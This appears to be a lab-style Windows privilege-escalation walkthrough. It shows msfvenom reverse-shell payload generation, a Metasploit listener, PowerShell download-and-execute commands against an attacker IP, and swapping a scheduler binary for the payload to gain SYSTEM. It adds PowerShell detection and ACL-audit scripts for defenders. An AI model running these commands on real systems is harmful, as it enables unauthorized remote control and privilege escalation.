
Windows Privilege Escalation

Generate a payload that gives a better (meterpreter) shell

hacker machine

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.9.175 LPORT=4442 -f exe -o shell.exe

Serve shell.exe from a local HTTP server (port 8000 by default)

hacker machine

python3 -m http.server

Start the listener

msfconsole
msf6 > search multi handler
...
   5  exploit/multi/handler
...
msf6 > use 5
msf6 exploit(multi/handler) > set LHOST 10.18.9.175
msf6 exploit(multi/handler) > set LPORT 4442
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

Download shell.exe onto the target

target machine

powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"

Run shell.exe to get the meterpreter session

target machine

cd C:\Windows\Temp
dir
.\shell.exe

Fetch and run winPEAS from a cmd shell inside the meterpreter session (winPEAS.bat is served from the same http.server directory)

target machine

meterpreter > shell
powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
cd C:\Windows\Temp
dir
.\winPEAS.bat
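The two download-and-execute steps above are what a defender would look for in PowerShell script-block logging (event ID 4104 in Microsoft-Windows-PowerShell/Operational). The following PowerShell is an added detection example, not part of the original walkthrough: it flags script-block text that downloads an executable into a world-writable staging directory. The sample entries are constructed to mirror the walkthrough's commands plus one benign download; the staging-directory list and extension list are this example's own assumptions.

```powershell
# Added detection example; not code from the original walkthrough.
# In production, feed in the Message property of
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104}
# The entries below are constructed for this example.
$SampleScriptBlocks = @(
    "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'",
    "Invoke-WebRequest -Uri 'https://updates.example.com/agent.zip' -OutFile 'C:\Users\alice\Downloads\agent.zip'",
    "Get-ChildItem C:\Windows\Temp",
    "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
)

# Directories any local user can normally write to (assumed list; extend for your estate).
$StagingDirs = @('C:\Windows\Temp', 'C:\Users\Public', 'AppData\Local\Temp')

# Download cmdlets/aliases and .NET helpers worth watching (assumed list).
$DownloadVerbs = 'Invoke-WebRequest|iwr|wget|curl|Start-BitsTransfer|DownloadFile|DownloadString'

# File types that are executed rather than opened.
$RiskyExt = 'exe|dll|bat|cmd|ps1|vbs|hta|scr'

function Test-StagedDownload {
    # Returns a finding object when the script block downloads a risky file type
    # into a staging directory, otherwise $null.
    param([Parameter(Mandatory)][string]$ScriptBlockText)

    if ($ScriptBlockText -notmatch "(?i)\b($DownloadVerbs)\b") { return $null }

    # Pull the destination from -OutFile / -Destination or the second DownloadFile argument.
    $destPattern = "(?i)(?:-OutFile|-Destination|DownloadFile\([^,]+,)\s*['""]?(?<dest>[^'""\s)]+)"
    if ($ScriptBlockText -notmatch $destPattern) { return $null }
    $dest = $Matches['dest']

    $inStaging = $false
    foreach ($dir in $StagingDirs) {
        if ($dest -match ('(?i)' + [regex]::Escape($dir))) { $inStaging = $true; break }
    }
    if (-not $inStaging) { return $null }
    if ($dest -notmatch "(?i)\.($RiskyExt)$") { return $null }

    [pscustomobject]@{
        Destination = $dest
        Text        = $ScriptBlockText
    }
}

# Run the rule over the sample entries; only the two shell.exe / winPEAS.bat lines are reported.
$SampleScriptBlocks |
    ForEach-Object { Test-StagedDownload -ScriptBlockText $_ } |
    Where-Object { $_ } |
    Format-Table -AutoSize
```

The rule deliberately keys on the destination rather than the source host: an attacker's IP changes per engagement, but an executable landing in C:\Windows\Temp and being launched from there is unusual for legitimate software deployment.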

Back up Message.exe in the SystemScheduler directory and replace it with shell.exe

target machine

meterpreter > cd "c:\Program Files (x86)\SystemScheduler"
meterpreter > cp Message.exe Message.exe.back
meterpreter > rm "c:\Program Files (x86)\SystemScheduler\Message.exe"
meterpreter > cd "c:\Windows\Temp"
meterpreter > cp shell.exe "c:\Program Files (x86)\SystemScheduler\Message.exe"
meterpreter > exit
msf6 exploit(multi/handler) > run

exit drops back to the msf prompt; run restarts the handler so it can catch the next callback.

Now, when the scheduler executes the replaced Message.exe, the handler should catch a root (SYSTEM) shell.
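The escalation only works because a low-privileged session can delete and recreate a binary that a privileged scheduler later runs. The following PowerShell is an added audit example for defenders, not part of the original walkthrough: it checks the directory and every .exe inside it for ACEs that grant broad principals replace rights, and verifies each binary's Authenticode signature. The default path is the one from the walkthrough; the principal list and the rights mask are this example's own assumptions.

```powershell
# Added audit example; not code from the original walkthrough.
param(
    [string]$Path = 'C:\Program Files (x86)\SystemScheduler'   # path from the walkthrough
)

# Principals that should never hold write/delete rights on a privileged binary (assumed list).
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights is enough to overwrite, replace or remove the object.
$ReplaceMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                     [System.Security.AccessControl.FileSystemRights]::Delete -bor
                     [System.Security.AccessControl.FileSystemRights]::Modify -bor
                     [System.Security.AccessControl.FileSystemRights]::FullControl -bor
                     [System.Security.AccessControl.FileSystemRights]::DeleteSubdirectoriesAndFiles)

function Get-WeakAce {
    # Returns one object per Allow ACE on $Item that grants a broad principal replace rights.
    param([Parameter(Mandatory)][string]$Item)
    $acl = Get-Acl -LiteralPath $Item
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if ((([int]$ace.FileSystemRights) -band $ReplaceMask) -ne 0) {
            [pscustomobject]@{
                Object    = $Item
                Principal = $ace.IdentityReference.Value
                Detail    = $ace.FileSystemRights
            }
        }
    }
}

function Invoke-SchedulerBinaryAudit {
    param([Parameter(Mandatory)][string]$Directory)
    # The directory ACL matters on its own: write + delete on the folder is enough
    # to swap a file (rm, then cp) even when the file's own ACL is strict.
    $findings = @(Get-WeakAce -Item $Directory)

    foreach ($exe in Get-ChildItem -LiteralPath $Directory -Filter '*.exe' -File) {
        $findings += @(Get-WeakAce -Item $exe.FullName)

        # A replaced binary normally loses its vendor signature (NotSigned or HashMismatch).
        $sig = Get-AuthenticodeSignature -LiteralPath $exe.FullName
        if ($sig.Status -ne [System.Management.Automation.SignatureStatus]::Valid) {
            $findings += [pscustomobject]@{
                Object    = $exe.FullName
                Principal = '(signature)'
                Detail    = $sig.Status
            }
        }
    }
    $findings
}

$results = @(Invoke-SchedulerBinaryAudit -Directory $Path)
if ($results.Count -eq 0) {
    Write-Output "No weak ACEs or unsigned binaries found under $Path"
} else {
    $results | Format-Table -AutoSize
}
```

Running this as an administrator after installation, and again on a schedule, surfaces the condition the walkthrough relies on; the fix is to strip write and delete rights for users from both the directory and the binaries so that only administrators and the installer can change what the scheduler executes.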